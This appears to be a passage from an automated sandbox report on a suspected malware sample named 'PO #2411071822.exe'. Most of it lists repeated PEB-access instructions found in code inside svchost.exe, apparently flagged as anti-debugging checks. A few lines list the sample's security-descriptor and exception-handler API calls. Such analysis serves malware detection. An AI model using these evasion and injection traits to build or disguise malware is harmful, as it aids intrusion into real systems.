                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0041A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00408189 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_004081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

